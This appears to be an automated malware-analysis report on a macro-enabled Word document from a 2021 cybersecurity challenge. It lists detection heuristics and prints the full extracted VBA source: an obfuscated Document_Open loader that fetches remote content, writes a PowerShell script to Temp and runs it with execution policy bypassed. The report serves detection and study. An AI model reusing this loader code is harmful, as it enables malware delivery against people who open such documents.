Office (OOXML) malware analysis — malicious · bd9c0a2035864f3d

MALICIOUS

Office (OOXML)

48.9 KB Created: 2021-02-06 17:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-29

MD5: 9bf01ecee23f54efc3acc8f67a66a88c SHA-1: 4385b7d76e6ce8e4263c2a92707037d73c65ca0b SHA-256: bd9c0a2035864f3dfb3d0dc987ad3eb7282278f8dca399254b419f6c26ef0cfd

438 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains a VBA macro within a Document_Open subroutine, which is a common technique for malicious Office documents. This macro utilizes WScript.Shell and PowerShell to download and execute a second-stage payload from a URL, as indicated by the critical OLE_VBA_DOWNLOAD and OLE_VBA_PS heuristics. The presence of an obfuscated auto-exec loader further supports its malicious intent.

Heuristics 12

VBA project inside OOXML medium 9 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Sub oPlsoa3(cmd As String)
    Shell cmd
End Sub
```

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

    If IsArray(var) = False Then
        aa99a = "Wscript.Shell"
    End If

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

Function jfsakl() As String
 jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass"
End Function

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare PtrSafe Function psi Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _

Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Function X1sla3(X9ss, los4) As String
    Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
    uL7sy12.Open getZZ(), los4, False
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Function X1sla3(X9ss, los4) As String
    Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
    uL7sy12.Open getZZ(), los4, False

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    Dim waA7S As String
    waA7S = Environ("temp") & "\runme." & "ps1"
    If IsArray(dast) = True Then

Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://www.untrustednetwork.net/misc/payload1.nul Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	8483 bytes
SHA-256: `22ec391741a94390794b08af08e9b53656fe358021b0792f864f63d9d0a77116`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' -------------------------------------------------------------------- ' ' This file is part of the European Cyber Security Challenge 2021 ' ' Treat it as you would any potentially dangerous file and exercise ' appropriate caution when analyzing it. ' ' Although it is benign, it simulates certain actions, which might ' lead to it being classified as malicious by anti-malware products. ' ' -------------------------------------------------------------------- Private Sub Document_Open() Dim alpha, beta, gamma, delta, epsilon, zeta, eta, theta, iota As Long Dim S1sla, L0pet As String alpha = 1122 beta = 9212 gamma = 4422 delta = 5647 epsilon = 1139 zeta = 6673 eta = 7474 theta = 1337 iota = 1002 kappa = 7892 alpha = beta * gamma gamma = eta - delta kappa = alpha * zeta eta = kappa / beta iota = eta + theta + iota gamma = eta / zeta zeta = alpha + epsilon epsilon = iota / alpha S1sla = getA() + getB() + getC() + getD() + getE() + getH() L0pet = getX() + getY() + getA() + getZ() + getE() + getF() + getX() If alpha = 1122 Then S1sla = getE() + getA() + getD() + getS() + getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS() L0pet = getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS() + getE() + getA() + getD() + getS() Ls21fa (S1sla) End If If alpha = 9212 Then L0pet = getT() + getU() + getW() + getV() + getH() + getH() + getL() + getI() + getJ() + getM() + getP() + getA() + getS() + getU() + getU() End If If gamma = 4422 Then S1sla = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getV() End If If delta = 5647 Then L0pet = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getS() X1sla3 S1sla, L0pet End If If epsilon = 1139 Then S1sla = getP() + getA() + getL() + getA() + getD() + getA() + getW() + getE() + getB() + getH() + getO() + getL() + getE() + getM() + getA() X1sla3 S1sla, L0pet End If End Sub Attribute VB_Name = "Module1" Sub Ls21fa(dast) Dim waA7S As String waA7S = Environ("temp") & "\runme." & "ps1" If IsArray(dast) = True Then SloA12 (waA7S) oPlsoa3 waA7S End If End Sub Function getA() As String If IsArray(var) = False Then getA = "V0B" End If End Function Function X1sla3(X9ss, los4) As String Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC()) uL7sy12.Open getZZ(), los4, False uL7sy12.Send goS67A = uL7sy12.responseText uL7sy12.Open getZZ(), X9ss, False uL7sy12.Send R0asda3 uL7sy12.responseText, goS67A kfid End Function Function getB() As String If IsArray(var) = False Then getB = "ftp" End If End Function Function getC() As String If IsArray(var) = False Then getC = "002" End If End Function Attribute VB_Name = "Module2" Private Declare PtrSafe Function psi Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, ByVal szFileName As String, _ ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Function dsa241() As String If IsArray(var) = False Then dsa241 = "ft.Xm" End If End Function Function Ssfas2E() As String If IsArray(var) = False Then Ssfas2E = "roso" End If End Function Function jfsakl() As String jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass" End Function Function getT() As String If IsArray(var) = False Then getT = "apsl" End If End Function Function getU() As String If IsArray(var) = False Then getU = "s0j" End If End Function Function getAC() As String If IsArray(var) = False Then getAC = "lHttp" End If End Function Function salww() As String salww = jfsakl End Function Function getV() As String If IsArray(var) = False Then getV = "oob" End If End Function Public Sub SloA12(Param) If kappa = 1234 Then psi 0, "https://www.untrustednetwork.net/misc/payload1.nul, Param, 0, 0" End If End Sub Function getW() As String If IsArray(var) = False Then getW = "x90" End If End Function Function vv3223() As String If IsArray(var) = False Then vv3223 = "Mic" End If End Function Public Sub kfid() sdeee1 = salww + " -file " + Environ(Gsa33()) + "\" + Gsa33() + looo1() Set lsi = CreateObject(aa99a) lsi.Run sdeee1, 0 End Sub Function sims22() As String If IsArray(var) = False Then sims22 = "jscript" End If End Function Attribute VB_Name = "Module3" Function getD() As String If IsArray(var) = False Then getD = "t2" End If End Function Function getE() As String If IsArray(var) = False Then getE = "Ht" End If End Function Function getF() As String If IsArray(var) = False Then getF = "Zqwj" End If End Function Function getH() As String If IsArray(var) = False Then getH = "cZ" End If End Function Function getI() As String If IsArray(var) = False Then getI = "_" End If End Function Function getJ() As String If IsArray(var) = False Then getJ = "eA8" End If End Function Function getK() As String If IsArray(var) = False Then getK = "tPs" End If End Function Function getL() As String If IsArray(var) = False Then getL = ":" End If End Function Function getM() As String If IsArray(var) = False Then getM = "JH6L4" End If End Function Function R0asda3(kl1a, sa12) As String Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim Fileout As Object Set Fileout = fso.CreateTextFile(Environ(Gsa33()) + "\" + Gsa33() + looo1(), True, True) Fileout.Write kl1a Fileout.Write sa12 End Function Function getN() As String If IsArray(var) = False Then getN = "/" End If End Function Function getO() As String If IsArray(var) = False Then getO = "mi" End If End Function Function getP() As String If IsArray(var) = False Then getP = "sc" End If End Function Function getQ() As String If IsArray(var) = False Then getQ = "01292" End If End Function Function getR() As String If IsArray(var) = False Then getR = "." End If End Function Function getS() As String If IsArray(var) = False Then getS = "vm2" End If End Function Sub oPlsoa3(cmd As String) Shell cmd End Sub Function getX() As String If IsArray(var) = False Then getX = "zIp" End If End Function Function getY() As String If IsArray(var) = False Then getY = "iEX" End If End Function Function getZ() As String If IsArray(var) = False Then getZ = "www" End If End Function Function getZZ() As String If IsArray(var) = False Then getZZ = "gEt" End If End Function Attribute VB_Name = "Module4" Function Gsa33() As String If IsArray(var) = False Then Gsa33 = "Temp" End If End Function Public Sub sa57s() Kill "C:\Windows\payload1.exe" End Sub Function des999() As String If IsArray(var) = False Then des999 = "apsl" End If End Function Function looo1() As String If IsArray(var) = False Then looo1 = ".ps1" End If End Function Function aa99a() As String If IsArray(var) = False Then aa99a = "Wscript.Shell" End If End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	56320 bytes
SHA-256: `1cb01ab51e3aa880af954d04eea3130f77cad8eae75da38ba5daf91145154a2c`

Open this report in the interactive analyzer, or submit your own file for analysis.